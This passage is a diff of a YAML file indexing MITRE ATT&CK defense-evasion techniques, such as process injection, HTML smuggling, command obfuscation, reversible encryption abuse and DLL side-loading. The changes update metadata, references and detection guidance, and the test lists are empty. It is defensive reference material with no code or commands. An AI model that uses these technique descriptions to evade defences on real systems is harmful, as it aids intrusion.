+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the creation of an instance in the <code>RunInstances</code> event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances create</code> to create a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Creation'
       - 'Instance: Instance Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+      created: '2020-05-14T14:45:15.978Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/002
+        external_id: T1578.002
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.009:
     technique:
@@ -12127,7 +12382,7 @@ defense-evasion:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -12170,8 +12425,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1601.001:
     technique:
@@ -12218,7 +12471,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:46.560Z'
       name: Patch System Image
       description: "Adversaries may modify the operating system of a network device
         to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -12284,12 +12537,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T22:30:01.227Z'
       name: Clear Persistence
       description: |-
         Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -12344,33 +12595,84 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
-  T1556.001:
+  T1036.010:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-10-17T15:20:36.705Z'
+      name: Masquerade Account Name
+      description: "Adversaries may match or approximate the names of legitimate accounts
+        to make newly created ones appear benign. This will typically occur during
+        [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+        may also be renamed at a later date. This may also coincide with [Account
+        Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+        deletes an account before re-creating one with the same name.(Citation: Huntress
+        MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+        such as those associated with legitimate software, data backups, or container
+        cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+        Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+        such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+        2024) Sometimes adversaries may model account names off of those already existing
+        in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+        \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+        which describes impersonating specific trusted individuals or organizations,
+        rather than user or service account names.  "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Menachem Goldstein
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - SaaS
+      - IaaS
+      - Containers
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Creation'
       type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
+      id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+      created: '2024-08-05T21:39:16.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1036/010
+        external_id: T1036.010
+      - source_name: Elastic CUBA Ransomware 2022
+        description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+          Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+          August 5, 2024.
+        url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+      - source_name: Invictus IR Cloud Ransomware 2024
+        description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+          August 5, 2024.
+        url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+      - source_name: Huntress MOVEit 2023
+        description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+          CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+        url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+      - source_name: Aquasec Kubernetes Attack 2023
+        description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+          Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+          2023.
+        url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.001:
+    technique:
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -12391,6 +12693,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -12405,22 +12708,42 @@ defense-evasion:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.006:
     technique:
-      modified: '2023-07-14T14:01:41.475Z'
+      modified: '2024-09-12T19:12:13.006Z'
       name: HTML Smuggling
       description: |-
         Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
@@ -12478,48 +12801,17 @@ defense-evasion:
         url: https://www.menlosecurity.com/blog/new-attack-alert-duri
       - source_name: nccgroup Smuggling HTA 2017
         description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
-          Explorer/Edge. Retrieved May 20, 2021.
-        url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+          Explorer/Edge. Retrieved September 12, 2024.
+        url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.006
     atomic_tests: []
   T1556.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
-      type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -12541,6 +12833,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -12551,23 +12844,50 @@ defense-evasion:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:43:18.873Z'
       name: Command Obfuscation
       description: |-
         Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
@@ -12608,8 +12928,9 @@ defense-evasion:
         url: https://attack.mitre.org/techniques/T1027/010
         external_id: T1027.010
       - source_name: Twitter Richard WMIC
-        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
-        url: https://twitter.com/rfackroyd/status/1639136000755765254
+        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+          2024.
+        url: https://x.com/rfackroyd/status/1639136000755765254
       - source_name: Invoke-Obfuscation
         description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
           March 17, 2023.
@@ -12645,43 +12966,23 @@ defense-evasion:
         url: https://redcanary.com/threat-detection-report/techniques/powershell/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1070.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Walker Johnson
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
-      created: '2020-01-31T12:35:36.479Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.004
-        url: https://attack.mitre.org/techniques/T1070/004
-      - source_name: Microsoft SDelete July 2016
-        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
-        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
-          8, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:33:59.107Z'
+      name: 'Indicator Removal on Host: File Deletion'
       description: |-
         Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
 
         There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Indicator Removal on Host: File Deletion'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Walker Johnson
+      x_mitre_deprecated: false
       x_mitre_detection: It may be uncommon for events related to benign command-line
         functions such as DEL or third-party utilities or tools to be found in an
         environment, depending on the user base and how systems are typically used.
@@ -12692,18 +12993,36 @@ defense-evasion:
         network that an adversary could introduce. Some monitoring tools may collect
         command-line arguments, but may not capture DEL commands since DEL is a native
         function within cmd.exe.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Deletion'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+      created: '2020-01-31T12:35:36.479Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/004
+        external_id: T1070.004
+      - source_name: Microsoft SDelete July 2016
+        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+          8, 2018.
+        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.004
     atomic_tests: []
   T1221:
@@ -12765,7 +13084,7 @@ defense-evasion:
         description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
           2018.
         source_name: ryhanson phishery SEPT 2016
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-12T18:16:56.176Z'
       name: Template Injection
       description: |-
         Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
@@ -12795,13 +13114,11 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1221
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -12898,7 +13215,6 @@ defense-evasion:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1027.002:
     technique:
@@ -12961,7 +13277,6 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1027.002
     atomic_tests: []
   T1564.005:
@@ -12999,7 +13314,7 @@ defense-evasion:
         description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
           Equation Group: Questions and Answers. Retrieved December 21, 2015.'
         url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-29T15:12:11.024Z'
       name: Hidden File System
       description: |-
         Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -13026,8 +13341,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1055.005:
     technique:
@@ -13055,7 +13368,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -13099,8 +13412,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1622:
     technique:
@@ -13155,7 +13466,7 @@ defense-evasion:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -13175,7 +13486,6 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1036.006:
@@ -13225,7 +13535,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1036.006
     atomic_tests: []
   T1550.002:
@@ -13280,12 +13589,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -13335,12 +13643,11 @@ defense-evasion:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1216.002:
     technique:
-      modified: '2024-04-18T23:51:40.464Z'
+      modified: '2024-09-12T19:42:21.547Z'
       name: SyncAppvPublishingServer
       description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
         of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -13400,8 +13707,8 @@ defense-evasion:
       - source_name: 7 - appv
         description: Nick Landers. (2017, August 8). Need a signed alternative to
           Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
-          Retrieved February 6, 2024.
-        url: https://twitter.com/monoxgas/status/895045566090010624
+          Retrieved September 12, 2024.
+        url: https://x.com/monoxgas/status/895045566090010624
       - source_name: 3 - appv
         description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
           Evasion (T1202). Retrieved February 6, 2024.'
@@ -13418,37 +13725,18 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
